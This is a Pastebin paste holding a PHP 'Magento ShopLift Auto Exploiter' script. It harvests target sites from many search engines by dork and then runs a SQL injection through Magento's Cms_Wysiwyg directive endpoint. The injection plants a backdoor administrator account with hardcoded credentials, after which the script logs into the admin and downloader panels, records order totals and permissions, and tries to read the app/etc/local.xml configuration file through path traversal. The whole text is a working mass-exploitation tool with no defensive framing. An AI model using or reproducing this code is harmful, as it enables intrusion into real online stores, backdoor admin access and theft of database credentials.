API tools faq
paste
Guest User

cc.php

a guest
Dec 23rd, 2018
91
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.11 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. // indoXploit Coder
  3. set_time_limit(0);
  4. class PakHaxor {
  5. private $dork = "";
  6. private $username = "T1KUS90T";//user passmu ganti
  7. private $password = "T1KUS90T";
  8.  
  9. public function Dork($dork){
  10. $this->dork = $dork;
  11. return $this->dork;
  12. }
  13.  
  14. private function CurlPost($url, $post = false){
  15. $ch = curl_init();
  16. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  17. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  18. curl_setopt($ch, CURLOPT_URL, $url);
  19. curl_setopt($ch, CURLOPT_HEADER, 0);
  20. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  21. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  22. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  23. if($post !== false){
  24. $isi = '';
  25. foreach($post as $key=>$value){
  26. $isi .= $key.'='.$value.'&';
  27. }
  28. rtrim($isi, '&');
  29. curl_setopt($ch, CURLOPT_URL, $url);
  30. curl_setopt($ch, CURLOPT_POST, count($isi));
  31. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  32. curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
  33. }
  34. $data = curl_exec($ch);
  35. curl_close($ch);
  36. return $data;
  37. }
  38.  
  39. private function GetStr($start,$end,$string){
  40. $a = explode($start,$string);
  41. $b = explode($end,$a[1]);
  42. return $b[0];
  43. }
  44.  
  45. private function LoginDownloader($url){
  46. $link = parse_url($url);
  47. $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
  48. array("username" => $this->username,
  49. "password" => $this->password)
  50. );
  51. if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
  52. $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
  53. return "Success\nPermission\t\t: ".$permission;
  54. $smtp = (!eregi("Smtp",$data) || !eregi("Mandrill",$data) || !eregi("smtp",$data) ? "Smtp Look" : "Ga Ada Smtp");
  55. return "Success\nSmtpPro\t\t: ".$smtp;
  56. $filesystem = (!eregi("File_System",$data) ? "File System Ada" : "No");
  57. return "Success\nFile system\t\t: ".$filesystem;
  58. } else {
  59. return "Failed";
  60. }
  61. }
  62.  
  63. private function LoginAdmin($target){
  64. $link = parse_url($target);
  65. $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
  66. $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
  67. $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
  68. array("login[username]" => $this->username,
  69. "login[password]" => $this->password,
  70. "form_key" => $key)
  71. );
  72. if($this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]))){
  73. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data)."\nInstaled\t\t:".$this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]));
  74. } else {
  75. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
  76. }
  77. }
  78.  
  79. private function ShopLiftExploit($target){
  80. $email = substr(md5(time()),2,15);
  81. $link = parse_url($target);
  82. $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
  83. array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
  84. "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
  85. "forwarded" => "1")
  86. );
  87. return (@imagecreatefromstring($data) !== false);
  88. }
  89.  
  90. private function ExecuteExploit($victim){
  91. $file = fopen("Target Result-".date("d-m-Y").".log","a");
  92. $url = parse_url($victim);
  93. $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
  94. if($this->ShopLiftExploit($target)){
  95. $downloader = $this->LoginDownloader($target);
  96. $admin = $this->LoginAdmin($target);
  97. $result = "\n============[ShopLift Result]============
  98. \nSite\t\t\t:{$target}
  99. \nLogin Admin\t\t:{$admin}
  100. \nLogin Downloader\t:{$downloader}
  101. \n\n";
  102. fwrite($file,$result);
  103. return $result;
  104. }else {
  105. return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
  106. }
  107.  
  108. fclose($file);
  109. }
  110.  
  111.  
  112. private function LocalFileDiscloure($target){
  113. $path = array( "/app/etc/local.xml",
  114. "/magmi/web/download_file.php?file=../../app/etc/local.xml"
  115. );
  116. for($i=0;$i<=count($path);$i++){
  117. $test = $this->CurlPost($target.$path[$i]);
  118. if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
  119. return $this->GetStr("<date><![CDATA[","]]></date>",$test);
  120. } else {
  121. return false;
  122. }
  123. }
  124. }
  125.  
  126. public function SearchEngine($engine){
  127. $list = array();
  128. $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
  129. $ccgoogle = array("ae");//,"com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
  130. $ccask = array("au","uk","ca","de","it","fr","es","ru","nl","pl","at","se","dk","no","br","mx","jp");
  131. $ccyahoo = array("au","ru","at","pl","il","tr","ua","gr","jp","cn","my","id","th","in","kr","tw","ro","za","pt","ca","uk","de","fr","es","it","hk","mx","br","ar","nl","dk","ph","cl","ru","co","fi","ve","nz","pe");
  132. switch($engine){
  133. case 1:
  134. for($i=0;$i<=1000;$i+=10){
  135. $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&first=".$i);
  136. preg_match_all('#<h2><a href="(.*?)" h="ID#', $search, $m);
  137. foreach($m[1] as $link){
  138. if(!preg_match("/live|msn|bing|microsoft/",$link)){
  139. if(!in_array($link,$list)){
  140. $list[] = $link;
  141. }
  142. }
  143. }
  144. echo "[".date("H:i:s")."] Catch Bing (".count(array_unique($m[1])).")\n";
  145. }
  146. echo "[".date("H:i:s")."] Total Bing : ".count($list)."\n";
  147. break;
  148. case 2:
  149. for($x=0;$x<=count($ccbing)-1;$x++){
  150. for($i=0;$i<=1000;$i+=10){
  151. $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE");
  152. preg_match_all('#<h2><a href="(.*?)" h="ID#', $search, $m);
  153. foreach($m[1] as $link){
  154. if(!preg_match("/live|msn|bing|microsoft/",$link)){
  155. if(!in_array($link,$list)){
  156. $list[] = $link;
  157. }
  158. }
  159. }
  160. echo "[".date("H:i:s")."] Catch Bing.".$ccbing[$x]." (".count(array_unique($m[1])).")\n";
  161. }
  162. }
  163. echo "[".date("H:i:s")."] Total Bing World : ".count($list)."\n";
  164. break;
  165. case 3:
  166. for($x=0;$x<=count($ccgoogle)-1;$x++){
  167. for($i=0;$i<=200;$i+=10){
  168. $search = $this->CurlPost("http://www.google.".$ccgoogle[$x]."/search?num=50&q=".urlencode($this->dork)."&start=".$i."&sa=N");
  169. preg_match_all('/<a href=\"?http:\/\/([^>\"]*)\//m', $search, $m);
  170. foreach($m[1] as $link){
  171. if(!preg_match("/google/",$link)){
  172. if(!in_array($link,$list)){
  173. $list[] = $link;
  174. }
  175. }
  176. }
  177. echo "[".date("H:i:s")."] Catch Google.".$ccgoogle[$x]." (".count(array_unique($m[1])).")\n";
  178. }
  179. }
  180. echo "[".date("H:i:s")."] Total Google World : ".count($list)."\n";
  181. break;
  182. case 4:
  183. for($x=0;$x<=count($ccask)-1;$x++){
  184. for($i=1;$i<=1000;$i+=100){
  185. $search = $this->CurlPost("http://".$ccask[$x].".ask.com/web?q=".urlencode($this->dork)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  186. preg_match_all('/href=\"http:\/\/(.*?)\" onmousedown=/m', $search, $m);
  187. foreach($m[1] as $link){
  188. if(!preg_match("/ask\.com/",$link)){
  189. if(!in_array($link,$list)){
  190. $list[] = $link;
  191. }
  192. }
  193. }
  194. echo "[".date("H:i:s")."] Catch Ask.".$ccask[$x]."(".count(array_unique($m[1])).")\n";
  195. }
  196. }
  197. echo "[".date("H:i:s")."] Total Ask World : ".count($list)."\n";
  198. break;
  199. case 5:
  200. for($i=1;$i<=100;$i+=1){
  201. $search = $this->CurlPost("http://search.walla.co.il/?q=".urlencode($this->dork)."&type=text&page=".$i);
  202. preg_match_all('/<a href=\"http:\/\/(.+?)\" title=/m', $search, $m);
  203. foreach($m[1] as $link){
  204. if(!preg_match("/walla\.co\.il/",$link)){
  205. if(!in_array($link,$list)){
  206. $list[] = $link;
  207. }
  208. }
  209. }
  210. echo "[".date("H:i:s")."] Catch Walla (".count(array_unique($m[1])).")\n";
  211. }
  212. echo "[".date("H:i:s")."] Total Walla : ".count($list)."\n";
  213. break;
  214. case 6:
  215. for($i=1;$i<=400;$i+=10){
  216. $search = $this->CurlPost("http://szukaj.onet.pl/".$i.",query.html?qt=".urlencode($this->dork));
  217. preg_match_all('/<a href=\"http:\/\/(.*?)\">/m', $search, $m);
  218. foreach($m[1] as $link){
  219. if(!preg_match("/onet|webcache|query/",$link)){
  220. if(!in_array($link,$list)){
  221. $list[] = $link;
  222. }
  223. }
  224. }
  225. echo "[".date("H:i:s")."] Catch Onet (".count(array_unique($m[1])).")\n";
  226. }
  227. echo "[".date("H:i:s")."] Total Onet : ".count($list)."\n";
  228. break;
  229. case 7:
  230. for($i=1;$i<=50;$i+=1){
  231. $search = $this->CurlPost("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$i."&q=".urlencode($this->dork)."&st=local");
  232. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  233. foreach($m[1] as $link){
  234. if(!preg_match("/\.sapo\.pt/",$link)){
  235. if(!in_array($link,$list)){
  236. $list[] = $link;
  237. }
  238. }
  239. }
  240. echo "[".date("H:i:s")."] Catch Sapo (".count(array_unique($m[1])).")\n";
  241. }
  242. echo "[".date("H:i:s")."] Total Sapo : ".count($list)."\n";
  243. break;
  244. case 8:
  245. for($i=1;$i<=50;$i+=1){
  246. $search = $this->CurlPost("http://search.lycos.com/web?q=".urlencode($this->dork)."&pn=".$i);
  247. preg_match_all('/title=\"http:\/\/(.*?)\"/m', $search, $m);
  248. foreach($m[1] as $link){
  249. if(!preg_match("/lycos/",$link)){
  250. if(!in_array($link,$list)){
  251. $list[] = $link;
  252. }
  253. }
  254. }
  255. echo "[".date("H:i:s")."] Catch Lycos (".count(array_unique($m[1])).")\n";
  256. }
  257. echo "[".date("H:i:s")."] Total Lycos : ".count($list)."\n";
  258. break;
  259. case 9:
  260. for($i=1;$i<=1000;$i+=10){
  261. $search = $this->CurlPost("http://busca.uol.com.br/web/?ref=homeuol&q=".urlencode($this->dork)."&start=".$i);
  262. preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
  263. foreach($m[1] as $link){
  264. if(!preg_match("/uol\.com\.br|\/web/i",$link)){
  265. if(!in_array($link,$list)){
  266. $list[] = $link;
  267. }
  268. }
  269. }
  270. echo "[".date("H:i:s")."] Catch Aol (".count(array_unique($m[1])).")\n";
  271. }
  272. echo "[".date("H:i:s")."] Total Uol : ".count($list)."\n";
  273. break;
  274. case 10:
  275. for($i=1;$i<=300;$i+=20){
  276. $search = $this->CurlPost("http://search.seznam.cz/?q=".urlencode($this->dork)."&count=20&from=".$i);
  277. preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
  278. foreach($m[1] as $link){
  279. if(!preg_match("/seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i",$link)){
  280. if(!in_array($link,$list)){
  281. $list[] = $link;
  282. }
  283. }
  284. }
  285. echo "[".date("H:i:s")."] Catch Seznam (".count(array_unique($m[1])).")\n";
  286. }
  287. echo "[".date("H:i:s")."] Total Seznam : ".count($list)."\n";
  288. break;
  289. case 11:
  290. for($i=1;$i<=50;$i+=1){
  291. $search = $this->CurlPost("http://www.hotbot.com/search/web?pn=".$i."&q=".urlencode($this->dork));
  292. preg_match_all('/href=\"http:\/\/(.+?)\" title=/m', $search, $m);
  293. foreach($m[1] as $link){
  294. if(!preg_match("/hotbot\.com/",$link)){
  295. if(!in_array($link,$list)){
  296. $list[] = $link;
  297. }
  298. }
  299. }
  300. echo "[".date("H:i:s")."] Catch Hotbot (".count(array_unique($m[1])).")\n";
  301. }
  302. echo "[".date("H:i:s")."] Total Hotbot : ".count($list)."\n";
  303. break;
  304. case 12:
  305. for($i=1;$i<=300;$i+=10){
  306. $search = $this->CurlPost("http://search.aol.com/aol/search?q=".urlencode($this->dork)."&page=".$i);
  307. preg_match_all('/href=\"http:\/\/(.*?)\"/m', $search, $m);
  308. foreach($m[1] as $link){
  309. if(!preg_match("/aol\.com/",$link)){
  310. if(!in_array($link,$list)){
  311. $list[] = $link;
  312. }
  313. }
  314. }
  315. echo "[".date("H:i:s")."] Catch Aol (".count(array_unique($m[1])).")\n";
  316. }
  317. echo "[".date("H:i:s")."] Total Aol : ".count($list)."\n";
  318. break;
  319. case 13:
  320. for($i=1;$i<=1000;$i+=10){
  321. $search = $this->CurlPost("http://search.yahoo.com/search?p=".urlencode($this->dork)."&b=".$i);
  322. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  323. foreach($m[1] as $link){
  324. if(!preg_match("/yahoo/",$link)){
  325. if(!in_array($link,$list)){
  326. $list[] = $link;
  327. }
  328. }
  329. }
  330. echo "[".date("H:i:s")."] Catch Yahoo (".count(array_unique($m[1])).")\n";
  331. }
  332. echo "[".date("H:i:s")."] Total Yahoo : ".count($list)."\n";
  333. break;
  334. case 14:
  335. for($x=0;$x<=count($ccyahoo)-1;$x++){
  336. for($i=1;$i<=1000;$i+=100){
  337. $search = $this->CurlPost("http://".$ccyahoo[$x].".search.yahoo.com/search;_ylt=A0geu8nrPalPnkQAVmPrFAx.?p=".urlencode($this->dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vst=0&vf=all&vc=hk&vm=p&fl=0&fr=yfp-t-501&fp_ip=11&xargs=0&pstart=1&b=".$i);
  338. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  339. foreach($m[1] as $link){
  340. if(!preg_match("/yahoo".$ccyahoo[$x]."/",$link)){
  341. if(!in_array($link,$list)){
  342. $list[] = $link;
  343. }
  344. }
  345. }
  346. echo "[".date("H:i:s")."] Catch Yahoo.".$ccyahoo[$x]." (".count(array_unique($m[1])).")\n";
  347. }
  348. }
  349. echo "[".date("H:i:s")."] Total Yahoo World : ".count($list)."\n";
  350. break;
  351. }
  352. if(count($list)>0){
  353. echo "Exploiting target ".count($list).". Please wait ... \n";
  354. foreach($list as $do){
  355. echo $this->ExecuteExploit($do);
  356. }
  357. }
  358. }
  359.  
  360. public function ExploitLogo(){
  361. $logo = "==================================================\n";
  362. $logo .= "#\t Magento ShopLift Auto Exploiter \t #\n";
  363. $logo .= "#------------------------------------------------#\n";
  364. $logo .= "#\t Usage \t\t: php ".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php \"Dork\"\t #\n";
  365. $logo .= "#------------------------------------------------#\n";
  366. $logo .= "#\t (C) ".date("Y")." Recoded By Pak Haxor \t\t #\n";
  367. $logo .= "==================================================\n";
  368. echo $logo;
  369. }
  370. }
  371. $Exploiter = new PakHaxor();
  372. if(isset($argv[1]) && !empty($argv[1])){
  373. if($argv[1]=="-l" && !empty($argv[2])){
  374. $file = file_get_contents($argv[2]);
  375. $list = explode("\n",$file);
  376. if(isset($list)){
  377. echo "Starting engine ....\n";
  378. flush();
  379. sleep(2);
  380. echo "[".date("H:i:s")."] Scanning ".count($list)." dorks. Please wait ... \n";
  381. foreach($list as $dork){
  382. echo "[".date("H:i:s")."] Scanning target for dork : {$dork}\n";
  383. $Exploiter->Dork($dork);
  384. for($i=0;$i<15;$i++){
  385. $Exploiter->SearchEngine($i);
  386. flush();
  387. sleep(1);
  388. }
  389. }
  390. }
  391. } else {
  392. echo "Starting engine ....\n";
  393. flush();
  394. sleep(2);
  395. echo "[".date("H:i:s")."] Scanning target for dork : {$argv[1]}\n";
  396. $Exploiter->Dork($argv[1]);
  397. for($i=0;$i<15;$i++){
  398. $Exploiter->SearchEngine($i);
  399. flush();
  400. sleep(1);
  401. }
  402. }
  403. echo "Scan finished !!!\n";
  404. flush();
  405. sleep(1);
  406. echo "Shuting down engine !!!\n";
  407. } else {
  408. $Exploiter->ExploitLogo();
  409. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!